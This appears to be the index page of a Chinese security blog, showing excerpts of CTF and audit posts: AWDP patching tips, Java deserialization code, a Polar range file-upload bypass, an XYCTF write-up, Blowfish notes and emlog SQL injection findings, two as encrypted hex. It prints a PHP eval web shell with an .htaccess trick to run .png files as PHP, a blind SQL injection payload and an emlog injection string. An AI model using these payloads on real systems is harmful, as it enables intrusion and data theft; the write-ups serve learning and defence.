awdp
AWDP什么是awdp?AWDP是一种综合考核参赛团队攻击、防御技术能力、即时策略的攻防兼备比赛模式。每个参赛队互为攻击方和防守方,充分体现比赛的实战性、实时性和对抗性,对参赛队的渗透能力和防护能力进行综合全面的考量。
说白了awdp其实就是ctf+漏洞修复罢了。
修复其实就是加waf,预处理,让主办方的payload无法打通修复后的web系统
正常修会比打简单,而且因为awdp是按轮数吃分的,修的越早能吃的分越多,所以一般都先修后打。
常见FIX手段SQL注入:加waf,过滤引号等,php就使用预处理,java若为mybatis就将${}改为#{}
rce :找到rce的点对命令执行的函数人eval,system引号反引号等进行过滤,也可以尝试对这个rce的点进行删除
php反序列化:找到链尾对其进行过滤,在反序列化前进行过滤。在链首部如__wakeup来判断其每个属性是否为类的实例,如果是就exit()
ssrf:一般ssrf都是有伴随着一个强制本地ip的命令执行路由或者文件读取路由,或者就是使用file://这种协议来文件读取,所以在写wa ...
java反序列常用方法(持续更新)
序列化反序列化123456789101112131415161718192021222324public static void Serializ(Object obj) throws Exception{ ByteArrayOutputStream bos=new ByteArrayOutputStream(); FileOutputStream fos = new FileOutputStream("ser.bin"); ObjectOutputStream oos=new ObjectOutputStream(bos); oos.writeObject(obj); byte[] byteArray = bos.toByteArray(); Base64.Encoder encoder = Base64.getEncoder(); String base64 = encoder.encodeToString(byteArray); Syste ...
Polar靶场
上传解法挺多的,一开始是发现.htaccess没有被禁止,而且<?被禁了。于是想到了尝试使用.htaccess和无<?马来getshell
12345//a.png<script language="php">eval ($_POST[hihack]);</script>//.htaccessAddType application/x-httpd-php .png
结果发现不行,直接通过.htaccess来使用php解释器来执行png文件,运行<script language="php">eval ($_POST[hihack]);</script>语法好像出现了问题与 .htaccess 相关的奇淫技巧发现可以使用.htaccess来文件包含和使用伪协议来命令执行,但是这个需要有php文件,且尝试发现无法目录穿越问题不大,简单将两个拼在一起即可file被禁可以使用\加换行符来过滤
文件读取123AddType application/x-httpd-php .pngphp_value ...
java-sec-code
简单刷一刷java-sec-code,加强一下各种漏洞在java中的表现sql注入jdbcjdbc其实就是java原生的用于sql查询的类。
攻击12345678910111213141516171819202122232425262728293031323334353637@RequestMapping("/jdbc/vuln")public String jdbc_sqli_vul(@RequestParam("username") String username) { StringBuilder result = new StringBuilder(); try { Class.forName(driver); Connection con = DriverManager.getConnection(url, user, password); if (!con.isClosed()) System.out.println("Connec ...
XYCTF
ez_puzzle简单玩一玩,可以发现打通后会弹一个窗口,我们搜游一下alert可以发现只有两个alert代码运行第二个alert可以发现其是失败后的弹窗那么第一个应该就是flag的了ctrl+s将源码扒下来,改一下alert的判断条件把小于号改成大于,再打通一次即可。
ezsql在登陆处发现sql注入,简单验证一些发现其过滤了空格,逗号之类的,使用括号来过滤空格,而因为无法使用逗号,所以直接使用盲注payload1admin'or(sleep(ascii(mid((select database())from(1)for(1)))>108))#当条件成立会时延1s写脚本直接爆爆出double_check为dtfrtkcc0czkoua9S账号密码为yudeyoushangzhonghengyisheng123456789101112131415161718192021222324252627282930313233import requestsimport timeimport jsonurl = "http://eci-2zefzg22buvmrl7v ...
TDEA算法
简介Blowfish是由Bruce Schneier在1993年发明的对称密钥分组加密算法,类似的DES和AES都是分组加密算法,Blowfish是用来替代DES算法出现的,并且Blowfish是没有商用限制的,任何人都可以自由使用。
对比而言,虽然AES也是一种密码强度很高的对称密码算法,但是如果需要商用的话要向NIST支付授权费用
加密流程Blowfish算法流程目录
一、密钥扩展
初始化静态参数
P数组(18个元素)
S盒(4×256元素)
融合用户密钥
密钥循环填充 → 异或修改P数组
动态生成参数
加密全零块 → 更新P数组
重复加密 → 更新4个S盒
二、加密流程
拆分明文
64位分组 → 左32位(L) + 右32位(R)
16轮Feistel迭代
每轮操作:
L异或P值 → 输入F函数
R异或F结果 → 交换L/R
最终输出
末轮不交换 → 异或P[16]/P[17]
合并为64位密文
循环流程
F函数内部流程
三、核心模块
F函数
拆分4字节 ...
一条emlog的水洞
aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db16f6b84918efa2c5e36af8e5ecf3d1f58e2a875b2b3f2ca38b1fb02105711657793a8ecb041b0bc58c20523744c9d9514a45e54bbe675764b0c37444af58d56bb6e0ac193849421c791a6f6e6320304b92eff76b0513b213053c50607d55b97a236c37fdfb0299c5929454bd73b212484de9e31103a448d53338f36f6fcc1176046b4b9759695d23cc5a501cc5da95c0b1ad08a26ae5cd556a50a1faeb39cf1ce9c980ef4f47d384514a3bb5fcd9ce3684edf80b4457b1c3b832cbd05f929ac7ea4160c861250ee779a66db49a8bb55758ded73b14cf97b57b ...
水的0day——emlog注册用户sql注入
aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db1154dc11004e2c8e760db0814a794c499291747cb94f1010f9c6e43019d15949342ccadc356deed5c6f392b3f0bce921ea7fc848be76b590ce0247b5f6371f88884ad18eafc53058318413b487815741a05f2426be88cd701373195b78f3dafbe091a93ec1ec33ff71b74002c3347e71cfc850ed59c6c0c658090e432ad024a164e354c665a85a7194eed967e4679f810c3c931214dd614d93b888354eee44d4bb4ec2ec8e480fb6ee1f03db9c8b08775684c8091880da619b17a67683916a69f50a85ae267d444e782f55206a3e6ca0943c2bfd3fc6aa1a38 ...
emlog的1day简单审计
简单审一些前台1day吧,前台的漏洞还真不怎么好挖,水后台的漏洞又没什么意思。两个简单的sql注入,Issues上看到的 auto_excerpt=y&logcontent=123\&as_logid=1&cover=or extractvalue(0x0a,concat(0x0a,(select database())))#